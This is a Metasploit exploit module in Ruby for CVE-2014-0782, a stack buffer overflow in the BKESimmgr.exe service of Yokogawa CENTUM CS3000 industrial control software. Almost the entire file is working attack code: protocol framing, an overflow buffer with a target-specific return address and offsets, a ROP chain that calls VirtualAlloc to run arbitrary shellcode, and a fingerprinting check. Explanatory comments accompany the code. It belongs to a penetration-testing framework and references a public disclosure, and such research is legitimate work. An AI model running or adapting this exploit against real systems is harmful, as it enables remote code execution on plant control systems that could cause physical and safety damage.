GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  # Remote exploit module for CVE-2014-0782: a stack-based buffer overflow in
  # the BKESimmgr.exe service of Yokogawa CENTUM CS3000. Per the description
  # below, the bug is a memcpy whose size count is taken from attacker-controlled
  # packet data. The service is reached over TCP; RPORT defaults to 34205.
  #
  # Wire framing used by every packet this module sends (see create_pkt):
  #   [N] operation id, 32-bit big-endian
  #   [n] length of the following data, 16-bit big-endian
  #   data
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  # Registers module metadata (name, description, references, payload
  # constraints, the single supported target with its return address and
  # fake-argument pointers) and the RPORT option.
  #
  # @param info [Hash] module info merged through update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Yokogawa CS3000 BKESimmgr.exe Buffer Overflow',
      'Description' => %q{
          This module exploits an stack based buffer overflow on Yokogawa CS3000. The vulnerability
        exists in the BKESimmgr.exe service when handling specially crafted packets, due to an
        insecure usage of memcpy, using attacker controlled data as the size count. This module
        has been tested successfully in Yokogawa CS3000 R3.08.50 over Windows XP SP3 and Windows
        2003 SP2.
      },
      'Author' =>
        [
          'juan vazquez',
          'Redsadic <julian.vilas[at]gmail.com>'
        ],
      'References' =>
        [
          ['CVE', '2014-0782'],
          ['URL', 'https://www.rapid7.com/blog/post/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities'],
          ['URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf']
        ],
      'Payload' =>
        {
          # Payload bytes available after the ROP chain (see exploit)
          'Space' => 340,
          'DisableNops' => true,
          # Stack adjustment emitted before the encoder: add esp, -3500
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [
            'Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]',
            {
              # Return address: ADD ESP,10 # RETN gadget in libbkebatchepa.dll
              'Ret' => 0x61d1274f,
              # Number of filler bytes before the saved return address
              'Offset' => 64,
              'FakeArgument1' => 0x0040E65C, # ptr to .data on BKESimmgr.exe
              'FakeArgument2' => 0x0040EB90 # ptr to .data on BKESimmgr.exe
            }
          ],
        ],
      'DisclosureDate' => '2014-03-10',
      'DefaultTarget' => 0))

    register_options(
      [
        # Default listening port of the BKESimmgr.exe service
        Opt::RPORT(34205)
      ])
  end

  # Fingerprints the service without triggering the overflow: a well-formed
  # packet carrying four random alphabetic bytes is sent and only the reply
  # header is inspected.
  #
  # @return [Exploit::CheckCode] Appears when the reply is exactly 10 bytes
  #   and decodes to the expected (1, 4, 5) header, Safe otherwise. Appears
  #   rather than Vulnerable: the probe confirms the protocol handshake, not
  #   the memcpy defect itself.
  def check
    data = create_pkt(rand_text_alpha(4))

    res = send_pkt(data)

    # parse_response unpacks "NnN", which consumes exactly 10 bytes
    if res && res.length == 10
      simmgr_res = parse_response(res)

      if valid_response?(simmgr_res)
        check_code = Exploit::CheckCode::Appears
      else
        check_code = Exploit::CheckCode::Safe
      end
    else
      check_code = Exploit::CheckCode::Safe
    end

    check_code
  end

  # Builds the overflow buffer and sends it once inside a sub-operation packet.
  #
  # Buffer layout, in order: target['Offset'] bytes of random filler, the
  # target return address, the two fake-argument pointers, 16 bytes of random
  # padding, the ROP chain from create_rop_chain, then the encoded payload.
  # The inner packet carries sub-operation id 1 and a 16-bit big-endian length;
  # create_pkt adds the outer framing. No response is read after sending.
  def exploit
    bof = rand_text(target['Offset'])
    bof << [target.ret].pack("V")
    bof << [target['FakeArgument1']].pack("V")
    bof << [target['FakeArgument2']].pack("V")
    bof << rand_text(16) # padding (corrupted bytes)
    bof << create_rop_chain
    bof << payload.encoded

    data = [0x1].pack("N") # Sub-operation id, <= 0x8 in order to pass the check at sub_4090B0
    data << [bof.length].pack("n") # inner length field, 16-bit big-endian
    data << bof

    pkt = create_pkt(data)

    print_status("Trying target #{target.name}, sending #{pkt.length} bytes...")
    connect
    sock.put(pkt)
    disconnect
  end

  # Returns the ROP chain as a string of little-endian 32-bit values. Each
  # entry is annotated below with the gadget (or immediate) it represents and
  # the module it lives in; the chain reads the VirtualAlloc pointer from an
  # IAT entry and finishes with PUSHAD # RETN.
  #
  # @return [String] packed gadget sequence
  def create_rop_chain
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets =
      [
        0x004047ca, # POP ECX # RETN [BKESimmgr.exe]
        0x610e3024, # ptr to &VirtualAlloc() [IAT libbkfmtvrecinfo.dll]
        0x61232d60, # MOV EAX,DWORD PTR DS:[ECX] # RETN [LibBKESysVWinList.dll]
        0x61d19e6a, # XCHG EAX,ESI # RETN [libbkebatchepa.dll]
        0x619436d3, # POP EBP # RETN [libbkeeda.dll]
        0x61615424, # & push esp # ret [libbkeldc.dll]
        0x61e56c8e, # POP EBX # RETN [LibBKCCommon.dll]
        0x00000001, # 0x00000001-> ebx
        0x61910021, # POP EDX # ADD AL,0 # MOV EAX,6191002A # RETN [libbkeeda.dll]
        0x00001000, # 0x00001000-> edx
        0x0040765a, # POP ECX # RETN [BKESimmgr.exe]
        0x00000040, # 0x00000040-> ecx
        0x6191aaab, # POP EDI # RETN [libbkeeda.dll]
        0x61e58e04, # RETN (ROP NOP) [LibBKCCommon.dll]
        0x00405ffa, # POP EAX # RETN [BKESimmgr.exe]
        0x90909090, # nop
        0x619532eb # PUSHAD # RETN [libbkeeda.dll]
      ].pack("V*")

    rop_gadgets
  end

  # Wraps data in the outer protocol framing: operation id 1 as a 32-bit
  # big-endian word, the data length as a 16-bit big-endian word, then data.
  #
  # @param data [String] packet body
  # @return [String] framed packet
  def create_pkt(data)
    pkt = [0x01].pack("N") # Operation Identifier
    pkt << [data.length].pack("n") # length
    pkt << data # Fake packet
    
    pkt
  end

  # Opens a connection, sends data, reads a single response with get_once and
  # disconnects.
  #
  # @param data [String] bytes to send
  # @return [String, nil] whatever sock.get_once returned (callers guard
  #   against nil)
  def send_pkt(data)
    connect
    sock.put(data)
    res = sock.get_once
    disconnect

    res
  end

  # Decodes a reply header as three integers: 32-bit big-endian, 16-bit
  # big-endian, 32-bit big-endian (10 bytes in total).
  #
  # @param data [String] raw response
  # @return [Array<Integer, nil>] the three unpacked fields
  def parse_response(data)
    data.unpack("NnN")
  end

  # Checks a decoded reply header from parse_response.
  #
  # @param data [Array<Integer>, nil] result of parse_response
  # @return [Boolean] true only when the fields are (1, 4, 5)
  def valid_response?(data)
    valid = false

    # NOTE(review): data[1] == 4 is tested twice; the duplicate is redundant
    # but does not change the result.
    if data && data[0] == 1 && data[1] == 4 && data[1] == 4 && data[2] == 5
      valid = true
    end

    valid
  end
end